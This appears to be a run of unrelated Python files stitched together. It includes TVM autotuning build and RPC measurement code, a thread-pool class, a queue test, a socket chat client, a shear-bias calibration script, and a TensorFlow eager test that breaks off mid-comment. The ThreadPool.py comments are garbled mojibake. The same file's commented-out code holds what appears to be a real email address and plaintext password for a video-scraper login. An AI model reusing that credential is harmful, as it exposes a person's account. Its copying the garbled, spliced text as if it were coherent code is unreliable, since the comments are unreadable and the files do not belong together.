def _build_func_common(measure_input, check_gpu=None, cuda_arch=None, build_option=None):
"""Common part for building a configuration"""
target, task, config = measure_input
with target:
s, args = task.instantiate(config)
# check invalidity of template and code hash consistency
if not config.valid():
raise InstantiationError(config.errors)
opts = build_option or {}
if check_gpu: # Add verify pass to filter out invalid configs in advance.
opts["add_lower_pass"] = [(2, gpu_verify_pass(**check_gpu))]
if cuda_arch:
set_cuda_target_arch(cuda_arch)
# if target is vta, we need to use vta build
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
import vta
func = vta.build(s, args, target_host=task.target_host)
else:
with build_config(**opts):
func = build(s, args, target_host=task.target_host)
return func, tuple((get_const_tuple(x.shape), x.dtype) for x in args)
def _wrap_build_func(build_func):
"""
Wrap build_func to a function that can be used in measure.
Parameters
----------
build_func : The compilation function
We expect fcompile to contain an attr "output_format"
Returns
-------
wrapped_build_func : function
The wrapped build function
"""
if not hasattr(build_func, "output_format"):
raise AttributeError("Expect build_func to have the attribute output_format.")
output_format = build_func.output_format
def _wrapped(measure_input, tmp_dir, **kwargs):
"""
Wrapped build func.
Parameters
----------
measure_input: MeasureInput
The input of measurement
tmp_dir: str
The path of temporary directory to export generated library
"""
tic = time.time()
try:
filename = os.path.join(tmp_dir, "tmp_func_%0x.%s" % (
getrandbits(64), output_format))
# TODO(tvm-team) consider linline _build_func_common
func, arg_info = _build_func_common(measure_input, **kwargs)
func.export_library(filename, build_func)
except Exception as e: # pylint: disable=broad-except
return BuildResult(None, None, e, time.time() - tic)
return BuildResult(filename, arg_info, None, time.time() - tic)
return _wrapped
def run_through_rpc(measure_input, build_result,
number, repeat, min_repeat_ms, cooldown_interval,
remote_args, ref_input=None, ref_output=None):
"""Run a generated library through rpc
Parameters
----------
measure_input: MeasureInput
The raw measure input
build_result: BuildResult
The result returned from Builder. This contains the path to the generated library.
number: int
The number of times to run the generated code for taking average.
We call these runs as one `repeat` of measurement.
repeat : int, optional
The number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up and will be discarded.
The returned result contains `repeat` costs,
each of which is an average of `number` costs.
min_repeat_ms: int, optional
The minimum duration of one `repeat` in milliseconds.
By default, one `repeat` contains `number` runs. If this parameter is set,
the parameters `number` will be dynamically adjusted to meet the
minimum duration requirement of one `repeat`.
i.e., When the run time of one `repeat` falls below this time, the `number` parameter
will be automatically increased.
cooldown_interval: float
The cool down interval between two measurements
remote_args: Tuple
The argument for request_remote
ref_input: List of np.ndarray
The reference input used for checking correctness
ref_output: List of np.ndarray
The reference output used for checking correctness
"""
if isinstance(build_result, MeasureResult):
return build_result
tic = time.time()
errno = MeasureErrorNo.NO_ERROR
try:
# upload built module
remote = request_remote(*remote_args)
# Program the FPGA every single time when targeting VTA
if hasattr(measure_input.target, 'device_name') and \
measure_input.target.device_name == 'vta':
# pylint: disable=import-outside-toplevel
from vta import program_fpga, reconfig_runtime
program_fpga(remote, None)
reconfig_runtime(remote)
remote.upload(build_result.filename)
func = remote.load_module(os.path.split(build_result.filename)[1])
ctx = remote.context(str(measure_input.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat, min_repeat_ms=min_repeat_ms)
# set input
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
# create empty arrays on the remote device and copy them once.
# This can avoid some memory issues that make the measurement results unreliable.
args = [nd.empty(x[0], dtype=x[1], ctx=ctx) for x in build_result.arg_info]
args = [nd.array(x, ctx=ctx) for x in args]
ctx.sync()
costs = time_f(*args).results
# clean up remote files
remote.remove(build_result.filename)
remote.remove(os.path.splitext(build_result.filename)[0] + '.so')
remote.remove('')
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
costs = tuple(costs[1:-1])
# check correctness of output
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "CUDA Source" in msg:
msg = msg[:msg.index("CUDA Source")]
costs = (RuntimeError(msg[:1024]),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
time.sleep(cooldown_interval)
return MeasureResult(costs, errno, tstamp - tic + build_result.time_cost, tstamp)
def request_remote(device_key, host=None, port=None, priority=1, timeout=60):
"""Request a remote session
Parameters
----------
device_key: string
The device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this session (units: second)
Returns
------
session: RPCSession
"""
# connect to the tracker
host = host or os.environ['TVM_TRACKER_HOST']
port = port or int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, host=None, port=None, priority=100, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
host: host, optional
The host address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port address of rpc tracker.
If is none, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this check (units: seconds).
Returns
-------
available: bool
True if can find available device
"""
def _check():
remote = request_remote(device_key, host, port, priority)
ctx = remote.context(str(target))
while not ctx.exist: # wait until we get an available device
pass
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
@tvm._ffi.register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
curr_cuda_target_arch = AutotvmGlobalScope.current.cuda_target_arch
# e.g., target arch could be [
# "-gencode", "arch=compute_52,code=sm_52",
# "-gencode", "arch=compute_70,code=sm_70"
# ]
target = "fatbin" if isinstance(curr_cuda_target_arch, list) else "ptx"
ptx = nvcc.compile_cuda(code, target=target, arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler
Parameters
----------
arch: str or list
The argument of nvcc -arch. (e.g. "sm_51", "sm_62")
it can also be a count of gencode arguments pass to nvcc command line,
e.g., ["-gencode", "arch=compute_52,code=sm_52", "-gencode", "arch=compute_70,code=sm_70"]
"""
AutotvmGlobalScope.current.cuda_target_arch = arch
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(f, *_):
valid = tvm.tir.analysis.verify_gpu_code(f, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return f
return tvm.tir.transform.prim_func_pass(verify_pass, opt_level=0)
|
ThreadPool.py | #!/usr/bin/env python
# -*- coding:utf-8 -*-
#!/usr/bin/env python
# -*- coding:utf-8 -*-
import queue
import threading
import contextlib
import time
# from hubSpider.spiders.downloader import xhub
StopEvent = object()
class ThreadPool(object):
def __init__(self, max_num):
self.q = queue.Queue()#ๅญๆพไปปๅก็้ๅ
self.max_num = max_num#ๆๅคง็บฟ็จๅนถๅๆฐ
self.terminal = False#ๅฆๆไธบTrue ็ปๆญขๆๆ็บฟ็จ๏ผไธๅ่ทๅๆฐไปปๅก
self.generate_list = [] #ๅทฒ็ปๅๅปบ็็บฟ็จ
self.free_list = []#้ฒ็ฝฎ็็บฟ็จ
self.sum_time=0
def run(self, func, args, callback=None):
"""
็บฟ็จๆฑ ๆง่กไธไธชไปปๅก
:param func: ไปปๅกๅฝๆฐ
:param args: ไปปๅกๅฝๆฐๆ้ๅๆฐ
:param callback: ไปปๅกๆง่กๅคฑ่ดฅๆๆๅๅๆง่ก็ๅ่ฐๅฝๆฐ๏ผๅ่ฐๅฝๆฐๆไธคไธชๅๆฐ1ใไปปๅกๅฝๆฐๆง่ก็ถๆ๏ผ2ใไปปๅกๅฝๆฐ่ฟๅๅผ๏ผ้ป่ฎคไธบNone๏ผๅณ๏ผไธๆง่กๅ่ฐๅฝๆฐ๏ผ
:return: ๅฆๆ็บฟ็จๆฑ ๅทฒ็ป็ปๆญข๏ผๅ่ฟๅTrueๅฆๅNone
"""
if len(self.free_list) == 0 and len(self.generate_list) < self.max_num: #ๆ ็ฉบ้ฒ็บฟ็จๅไธ่ถ
่ฟๆๅคง็บฟ็จๆฐ
self.generate_thread() # ๅๅปบ็บฟ็จ
w = (func, args, callback,)#ไฟๅญๅๆฐไธบๅ
็ป
self.q.put(w)#ๆทปๅ ๅฐไปปๅก้ๅ
self.sum_time+=1
def generate_thread(self):
"""
ๅๅปบไธไธช็บฟ็จ
"""
t = threading.Thread(target=self.call)
t.start()
def call(self):
"""
ๅพช็ฏๅป่ทๅไปปๅกๅฝๆฐๅนถๆง่กไปปๅกๅฝๆฐ
"""
current_thread = threading.currentThread#่ทๅๅฝๅ็บฟ็จๅฏน่ฑก
self.generate_list.append(current_thread)#ๆทปๅ ๅฐๅทฒๅๅปบ็บฟ็จ้
event = self.q.get() #่ทๅไปปๅก
while event != StopEvent: #ๅฆๆไธไธบๅๆญขไฟกๅท
func, arguments, callback = event#ๅๅซๅๅผ๏ผ
try:
result = func(*arguments) #่ฟ่กๅฝๆฐ๏ผๆ็ปๆ่ตๅผ็ปresult
status = True #่ฟ่ก็ปๆๆฏๅฆๆญฃๅธธ
except Exception as e:
status = False #ไธๆญฃๅธธ
result = e #็ปๆไธบ้่ฏฏไฟกๆฏ
# print(e)
if callback is not None: # ๆฏๅฆๆๅ่ฐๅฝๆฐ
try:
callback(self.sum_time,status, result) #ๆง่กๅ่ฐๅฝๆฐ
except Exception as e:
pass
if self.terminal: # ้ป่ฎคไธบFalse ๏ผๅฆๆ่ฐ็จterminalๆนๆณ
event = StopEvent #ๅๆญขไฟกๅท
else:
# self.free_list.append(current_thread) #ๆง่กๅฎๆฏไปปๅก๏ผๆทปๅ ๅฐ้ฒ็ฝฎๅ่กจ
# event = self.q.get() #่ทๅไปปๅก
# self.free_list.remove(current_thread) #่ทๅๅฐไปปๅกไนๅ๏ผไป้ฒ็ฝฎ้ๅ ้ค
with self.worker_state(self.free_list,current_thread):
event = self.q.get()
else:
self.generate_list.remove(current_thread) #ๅฆๆๆถๅฐ็ปๆญขไฟกๅท๏ผๅฐฑไปๅทฒๅๅปบ็ๅ่กจๅ ้ค
def close(self): #็ปๆญข็บฟ็จ
num = len(self.generate_list) #่ทๅๆปๅทฒๅๅปบ็็บฟ็จ
while num:
self.q.put(StopEvent) #ๆทปๅ ๅๆญขไฟกๅท๏ผๆๅ ไธช็บฟ็จๅฐฑๆทปๅ ๅ ไธช
num -= 1
# ็ปๆญข็บฟ็จ๏ผๆธ
็ฉบ้ๅ๏ผ
def terminate(self):
self.terminal = True #ๆดๆนไธบTrue๏ผ
while self.generate_list: #ๅฆๆๆๅทฒๅๅปบ็บฟ็จๅญๆดป
self.q.put(StopEvent) #ๆๅ ไธชๅฐฑๅๅ ไธชไฟกๅท
self.q.empty() #ๆธ
็ฉบ้ๅ
@contextlib.contextmanager
def worker_state(self,free_list,current_thread):
free_list.append(current_thread)
try:
yield
finally:
free_list.remove(current_thread)
import time
index=0
def work(i):
# print(i)
pass
pool = ThreadPool(10)
index=0
def is_down(i,status, result):
print(i)
print(status)
print(result)
print("ๆง่กๅฎไบ")
for item in range(50):
pool.run(func=work, args=(item,),callback=is_down)
# print(result)
# pool.terminate()
pool.close()
# a=xhub("1601684622@qq.com","srx62600")
# pool=ThreadPool(10)
# f=open("../video/video_url.txt",mode="r",encoding="utf-8")
# for i in f:
# pool.run(func=xhub.parse_url,args=(i,))
# print(i)
# pool.close() |
thread_queue_test.py | import pytest
from time import sleep
from threading import Thread
from queue import Queue
from zthreading.thread_queue import Queue
def test_simple_queue():
queue = Queue()
def do_enqueue():
sleep(0.1)
queue.put("valid")
pass
Thread(target=do_enqueue).start()
assert queue.get(timeout=0.2) == "valid"
if __name__ == "__main__":
# test_simple_queue()
pytest.main(["-x", __file__])
|
client.py | import json
import socket
import threading
from dearpygui.core import *
from dearpygui.simple import *
with open('user/settings.hqs', 'r') as usersettings:
user = json.load(usersettings)
with open(f'languages/{user["language"]}.hqs', 'r') as language:
lang = json.load(language)
username = 'test'
FORMAT = 'utf-8'
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def show(msg):
delete_item('ChatWidget')
add_window('ChatWidget', no_title_bar=True, no_move=True,
width=875, height=600, x_pos=400, y_pos=15,
no_resize=False)
add_text(get_value('IP'))
add_separator()
add_text(msg)
def connect(sender, data):
client.connect((get_value('IP'), get_value('Port')))
#rcv = threading.Thread(target=receive)
#rcv.start()
run_async_function(receive, 'RECEIVE FUNCTION')
def sendButton(sender, data):
receive(sender='', data='')
# function to receive messages
def receive(sender, data):
while True:
try:
message = client.recv(1024).decode(FORMAT)
# if the messages from the server is NAME send the client's name
if message == 'NAME':
client.send(username.encode(FORMAT))
else:
add_text(message)
except:
# an error will be printed on the command line or console if there's an error
print("An error occured!")
client.close()
break
# function to send messages
def sendMessage(self):
while True:
message = (f"{self.name}: {self.msg}")
client.send(message.encode(FORMAT))
break
|
4_RunShearBias.py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Feb 9 17:49:17 2020
@author: ssli
Script to run the shear bias calibration
Package:
ShearBias.mCalFunc
Data location:
Input: SimCat, KV450/tomo, KV450/split
Output: CosmicShear/shear_bias/
"""
import multiprocessing as mp
import feather
import time
import os
import sys
# Self-defined package
sys.path.insert(0,os.path.realpath('..'))
from ShearBias import mCalFunc
Start = time.time()
# directory to SimCat
inDirSim = "/disks/shear15/ssli/SimCat/"
# directory to KV450 data
inDirReal = "/disks/shear15/ssli/KV450/"
# directory for output
outDir = "/disks/shear15/ssli/CosmicShear/shear_bias/"
# Number of tomographic bins
Nbins = 5
# Number of re-weighting bins
Nbin1 = 20
Nbin2 = 20
# output
outpath_whole = outDir + "Summary_m_whole.csv"
outpath_red = outDir + "Summary_m_less3.csv"
outpath_blue = outDir + "Summary_m_greater3.csv"
#
outfile_whole = open(outpath_whole, "w")
print("bin,m,m_err_BS,m1,m2,m1_err,m2_err,m1_err_BS,m2_err_BS", file=outfile_whole)
outfile_red = open(outpath_red, "w")
print("bin,m,m_err_BS,m1,m2,m1_err,m2_err,m1_err_BS,m2_err_BS", file=outfile_red)
outfile_blue = open(outpath_blue, "w")
print("bin,m,m_err_BS,m1,m2,m1_err,m2_err,m1_err_BS,m2_err_BS", file=outfile_blue)
# for mp
jobs_whole = []
pq_whole = mp.Queue()
jobs_red = []
pq_red = mp.Queue()
jobs_blue = []
pq_blue = mp.Queue()
# MC calculation
for i in range(Nbins):
# for i in range(1):
# simulated data
inpathSim_whole = inDirSim + "SimCatSelec_tomo" + str(i+1) +'.feather'
inpathSim_red = inDirSim + "SimCatSelec_tomo" + str(i+1) +'_TB9_in_less3.feather'
inpathSim_blue = inDirSim + "SimCatSelec_tomo" + str(i+1) +'_TB9_in_greater3.feather'
#
dataSim_whole = feather.read_dataframe(inpathSim_whole)
dataSim_red = feather.read_dataframe(inpathSim_red)
dataSim_blue = feather.read_dataframe(inpathSim_blue)
# real data
inpathReal_whole = inDirReal + 'tomo/all_tomo' + str(i+1) +'.feather'
inpathReal_red = inDirReal + 'split/all_tomo' + str(i+1) +'_T_B_less3.feather'
inpathReal_blue = inDirReal + 'split/all_tomo' + str(i+1) +'_T_B_greater3.feather'
#
dataReal_whole = feather.read_dataframe(inpathReal_whole)
dataReal_red = feather.read_dataframe(inpathReal_red)
dataReal_blue = feather.read_dataframe(inpathReal_blue)
p_whole = mp.Process(target=mCalFunc, args=(i+1, dataSim_whole, dataReal_whole, Nbin1, Nbin2, pq_whole))
p_red = mp.Process(target=mCalFunc, args=(i+1, dataSim_red, dataReal_red, Nbin1, Nbin2, pq_red))
p_blue = mp.Process(target=mCalFunc, args=(i+1, dataSim_blue, dataReal_blue, Nbin1, Nbin2, pq_blue))
jobs_whole.append(p_whole)
p_whole.start()
print("Start running for bin", str(i+1), "in whole data.")
jobs_red.append(p_red)
p_red.start()
print("Start running for bin", str(i+1), "in red data.")
jobs_blue.append(p_blue)
p_blue.start()
print("Start running for bin", str(i+1), "in blue data.")
for p_whole in jobs_whole:
p_whole.join()
for p_red in jobs_red:
p_red.join()
for p_blue in jobs_blue:
p_blue.join()
print("Finished running all.")
print("Start saving data information...")
while not pq_whole.empty():
tmp = pq_whole.get()
print(tmp["id_bin"], tmp["m_final"], tmp['m_err_BS_final'], \
tmp['m1_final'], tmp['m2_final'], \
tmp['m1_err_final'], tmp['m2_err_final'], \
tmp['m1_err_BS_final'], tmp['m2_err_BS_final'], \
sep=',', file=outfile_whole)
outfile_whole.close()
while not pq_red.empty():
tmp = pq_red.get()
print(tmp["id_bin"], tmp["m_final"], tmp['m_err_BS_final'], \
tmp['m1_final'], tmp['m2_final'], \
tmp['m1_err_final'], tmp['m2_err_final'], \
tmp['m1_err_BS_final'], tmp['m2_err_BS_final'], \
sep=',', file=outfile_red)
outfile_red.close()
while not pq_blue.empty():
tmp = pq_blue.get()
print(tmp["id_bin"], tmp["m_final"], tmp['m_err_BS_final'], \
tmp['m1_final'], tmp['m2_final'], \
tmp['m1_err_final'], tmp['m2_err_final'], \
tmp['m1_err_BS_final'], tmp['m2_err_BS_final'], \
sep=',', file=outfile_blue)
outfile_blue.close()
print("All Finished in", time.time()-Start)
# eemmeer (March 15, 2020)
# All Finished in 61.41844892501831 |
core_test.py | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for core."""
import collections
import os
import pickle
import threading
import numpy as np
from tensorflow.core.protobuf import config_pb2
from tensorflow.python import pywrap_tfe
from tensorflow.python.eager import context
from tensorflow.python.eager import core
from tensorflow.python.eager import def_function
from tensorflow.python.eager import execute as execute_lib
from tensorflow.python.eager import executor
from tensorflow.python.eager import test
from tensorflow.python.framework import config
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import device as pydev
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import gen_resource_variable_ops
from tensorflow.python.ops import nn_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import variables
def execute(op_name, num_outputs, inputs, attrs=None):
return execute_lib.execute(
op_name, num_outputs, inputs, attrs, context.context())
def truncated_normal(shape):
return execute(
b'TruncatedNormal',
1,
inputs=[shape],
attrs=('dtype', dtypes.float32.as_datatype_enum, 'T',
shape.dtype.as_datatype_enum, 'seed', 0, 'seed2', 0))[0]
def current_device():
return array_ops.identity(1.).device
def configure_virtual_cpus():
cpus = config.list_physical_devices('CPU')
# Set 2 virtual CPUs
config.set_logical_device_configuration(cpus[0], [
context.LogicalDeviceConfiguration(),
context.LogicalDeviceConfiguration()
])
class TFETest(test_util.TensorFlowTestCase):
def setUp(self):
super(TFETest, self).setUp()
context._reset_context()
configure_virtual_cpus()
def _test_hashable(self, a, b, hashable):
if hashable:
self.assertIsInstance(b, collections.Hashable)
self.assertLen(set([a, b]), 2)
else:
# TODO(gjn): Figure out how to make this work for tf.Tensor
# self.assertNotIsInstance(b, collections.Hashable)
with self.assertRaisesRegex(TypeError, 'unhashable'):
set([a, b])
def testEquality(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertEqual(a, 1.0)
self.assertIsNot(a, 1.0)
self.assertEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(1.0)
constant_b = constant_op.constant(1.0)
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(1.0)
variable_b = variables.Variable(1.0)
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
# We only test numpy behaviour in v2 mode since we'd like to match that.
numpy_a = np.array(1.0)
numpy_b = np.array(1.0)
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityNan(self):
default = ops.Tensor._USE_EQUALITY
try:
def _v1_check(a, b):
self.assertEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
def _v2_check(a, b):
self.assertNotEqual(a, a)
self.assertIs(a, a)
self.assertNotEqual(a, float('nan'))
self.assertIsNot(a, float('nan'))
self.assertNotEqual(a, b)
self.assertIsNot(a, b)
constant_a = constant_op.constant(float('nan'))
constant_b = constant_op.constant(float('nan'))
ops.disable_tensor_equality()
self._test_hashable(constant_a, constant_b, True)
_v1_check(constant_a, constant_b)
ops.enable_tensor_equality()
_v2_check(constant_a, constant_b)
self._test_hashable(constant_a, constant_b, False)
variable_a = variables.Variable(float('nan'))
variable_b = variables.Variable(float('nan'))
ops.disable_tensor_equality()
_v1_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, True)
ops.enable_tensor_equality()
_v2_check(variable_a, variable_b)
self._test_hashable(variable_a, variable_b, False)
numpy_a = np.array(float('nan'))
numpy_b = np.array(float('nan'))
_v2_check(numpy_a, numpy_b)
self._test_hashable(numpy_a, numpy_b, False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityCompare(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 2])
tf_b = constant_op.constant([1, 2])
tf_c = constant_op.constant([1, 1])
np_a = np.array([1, 2])
np_b = np.array([1, 2])
np_c = np.array([1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
# We can compare list of tensors
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
self.assertNotEqual([tf_a, tf_b], [tf_b, tf_b])
# We can compare existence in a list
self.assertIn(tf_a, [tf_a, tf_b])
self.assertIn(tf_a, [tf_b, tf_a])
self.assertNotIn(tf_a, [tf_b, tf_c])
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [True, False])
self.assertNotAllEqual(tf_a, tf_c)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [True, False])
self.assertNotAllEqual(np_a, np_c)
# Warning even though we technically shouldn't be able to compare here,
# since the id is the same both TF & numpy will handle lists with the same
# value without raising an error
self.assertEqual([tf_a, tf_b], [tf_a, tf_b])
with self.assertRaises(ValueError):
bool([tf_a, tf_b] == [tf_b, tf_b])
self.assertEqual([np_a, np_b], [np_a, np_b])
with self.assertRaises(ValueError):
bool([np_a, np_b] == [np_b, np_b])
# Similar to lists we shouldn't be able to do a `in` check such as
# `if a in [a,b]`. However if `a` is the first element, it works due to
# short circuiting
self.assertIn(tf_a, [tf_a, tf_b])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_a])
with self.assertRaises(ValueError):
bool(tf_a in [tf_b, tf_c])
self.assertIn(np_a, [np_a, np_b])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_a])
with self.assertRaises(ValueError):
bool(np_a in [np_b, np_c])
# rank 0
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(1), True)
self.assertAllEqual(
constant_op.constant(1) == constant_op.constant(2), False)
self.assertAllEqual(np.array(1) == np.array(1), True)
self.assertAllEqual(np.array(1) == np.array(2), False)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
def testEqualityBroadcast(self):
default = ops.Tensor._USE_EQUALITY
try:
tf_a = constant_op.constant([1, 1])
tf_b = constant_op.constant([1, 1])
tf_c = constant_op.constant([[1, 1], [1, 1]])
tf_d = constant_op.constant([[1, 2], [1, 2]])
tf_e = constant_op.constant([1, 1, 1])
np_a = np.array([1, 1])
np_b = np.array([1, 1])
np_c = np.array([[1, 1], [1, 1]])
np_d = np.array([[1, 2], [1, 2]])
np_e = np.array([1, 1, 1])
ops.disable_tensor_equality()
# We don't do element-wise comparison
self.assertNotEqual(tf_a, tf_b)
self.assertNotEqual(tf_a, tf_c)
self.assertNotEqual(tf_a, tf_d)
ops.enable_tensor_equality()
# We do element-wise comparison but can't convert results array to bool
with self.assertRaises(ValueError):
bool(tf_a == tf_b)
self.assertAllEqual(tf_a == tf_b, [True, True])
with self.assertRaises(ValueError):
bool(tf_a == tf_c)
self.assertAllEqual(tf_a == tf_c, [[True, True], [True, True]])
with self.assertRaises(ValueError):
bool(tf_a == tf_d)
self.assertAllEqual(tf_a == tf_d, [[True, False], [True, False]])
self.assertFalse(bool(tf_a == tf_e))
self.assertTrue(bool(tf_a != tf_e))
self.assertNotAllEqual(tf_a, tf_e)
with self.assertRaises(ValueError):
bool(np_a == np_b)
self.assertAllEqual(np_a == np_b, [True, True])
with self.assertRaises(ValueError):
bool(np_a == np_c)
self.assertAllEqual(np_a == np_c, [[True, True], [True, True]])
self.assertAllEqual(np_a == np_d, [[True, False], [True, False]])
self.assertFalse(bool(np_a == np_e))
self.assertTrue(bool(np_a != np_e))
self.assertNotAllEqual(np_a, np_e)
finally:
if default:
ops.enable_tensor_equality()
else:
ops.disable_tensor_equality()
@test_util.disable_tfrt('Get execution mode not supported in TFRT.')
def testContext(self):
ctx = context.Context()
self.assertTrue(ctx.executing_eagerly())
self.assertEqual('', ctx.scope_name)
ctx.scope_name = 'foo'
self.assertEqual('foo', ctx.scope_name)
self.assertEqual(context.SYNC, ctx.execution_mode)
ctx.execution_mode = context.ASYNC
self.assertEqual(context.ASYNC, ctx.execution_mode)
ctx.execution_mode = context.SYNC
self.assertEqual(context.SYNC, ctx.execution_mode)
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('GPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(None):
self.assertEqual('', ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device('CPU:0'):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
with ctx.device(ctx.list_logical_devices('CPU')[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
gpus = ctx.list_logical_devices('GPU')
if gpus:
with ctx.device(gpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:GPU:0',
ctx.device_name)
self.assertEqual(ctx.device_name, ctx.device_spec.to_string())
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
def testDevice_supportsLogicalDevice(self):
ctx = context.Context()
cpus = ctx.list_logical_devices('CPU')
with ctx.device(cpus[0]):
self.assertEqual('/job:localhost/replica:0/task:0/device:CPU:0',
ctx.device_name)
def testDevice_supportsDeviceSpec(self):
ctx = context.Context()
device_name = '/job:localhost/replica:0/task:0/device:CPU:0'
device_spec = pydev.DeviceSpec.from_string(device_name)
with ctx.device(device_spec):
self.assertEqual(device_name, ctx.device_name)
def testAsyncBasic(self):
ctx = context.Context(execution_mode=context.ASYNC)
ctx.ensure_initialized()
has_cpu_device = False
for x in ctx.devices():
has_cpu_device = has_cpu_device or 'CPU' in x
self.assertTrue(has_cpu_device)
del ctx
@test_util.disable_tfrt('Multi CPU placement not supported yet.')
def testMultiCpuPlacement(self):
with ops.device('cpu:1'):
x = array_ops.identity(1.0)
with ops.device('cpu:0'):
y = array_ops.identity(x)
self.assertEqual(x.device, '/job:localhost/replica:0/task:0/device:CPU:1')
self.assertEqual(y.device, '/job:localhost/replica:0/task:0/device:CPU:0')
@test_util.run_gpu_only
def testShouldCopy(self):
with ops.device('GPU:0'):
x = array_ops.identity(1.0)
self.assertEndsWith(x.device, 'GPU:0')
y = array_ops.identity(x)
# The value we're testing y.device against will depend on what the behavior
# of not explicitly specifying a device in the context is. This behavior is
# subject to change (for example, in the future we may want to use GPUs, if
# available, when no device is explicitly provided)
self.assertEqual(y.device, current_device())
def testContextSwitchStackContainsEagerMode(self):
# Eager execution has been enabled, and no other context switch has
